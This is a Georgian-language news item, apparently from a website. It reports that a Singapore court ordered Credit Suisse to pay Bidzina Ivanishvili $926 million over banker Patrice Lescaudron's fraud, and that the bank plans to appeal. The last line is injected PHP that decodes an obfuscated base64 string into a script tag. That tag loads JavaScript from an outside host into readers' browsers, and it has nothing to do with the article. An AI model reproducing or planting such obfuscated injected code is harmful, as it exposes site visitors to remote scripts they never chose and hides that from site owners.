celsiusi
ავერსი საქკაბელი

სინგაპურის სასამართლომ Credit Suisse-ს მილიარდერ ბიძინა ივანიშვილისთვის 926 მილიონი დოლარის გადახდა დააკისრა, - ინფორმაციას Bloomberg-ი ავრცელებს.

სასამართლოს მიერ გამოქვეყნებული გადაწყვეტილების თანახმად, სინგაპურში დაფუძნებულმა Credit Suisse Trust Ltd-მა დაარღვია მოვალეობა მოსარჩელეების მიმართ, რადგან ვერ შეასრულა ტრასტის აქტივების დაცვის ვალდებულება.

”დღეს გამოქვეყნებული გადაწყვეტილება მცდარია და ძალიან მნიშვნელოვან იურიდიულ საკითხებს აჩენს”, - განაცხადა Credit Suisse-ის პრესსპიკერმა.

მისი განმარტებით, Credit Suisse სასამართლოს გადაწყვეტილების გასაჩივრებას გეგმავს.

სასამართლოს გადაწყვეტილებაში ხაზგასმულია, რომ Credit Suisse-ს ტრასტმა ვერ მოახერხა აღეკვეთა კერძო ბანკირ პატრის ლესკაუდრონოს აქტივებზე შემდგომი წვდომა. ლესკოდრონი 2018 წელს გაასამართლეს თაღლითური სქემის განხორციელებისთვის, რომლითაც მან ივანიშვილის ანგარიშებიდან ფული მიითვისა.

გასულ წელს, ბერმუდის სასამართლომ გადაწყვეტილება ბიძინა ივანიშვილის სასარგებლოდ მიიღო და დაადგინა, რომ Credit Suisse-ის სადაზღვევო განყოფილებამ თვალი დახუჭა ლესკადრონის დანაშაულზე, რის გამოც, Credit Suisse-ს ივანიშვილისთვის ზარალის ასანაზღაურებლად 600 მილიონ დოლარზე მეტის გადახდა დააკისრა.

513
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");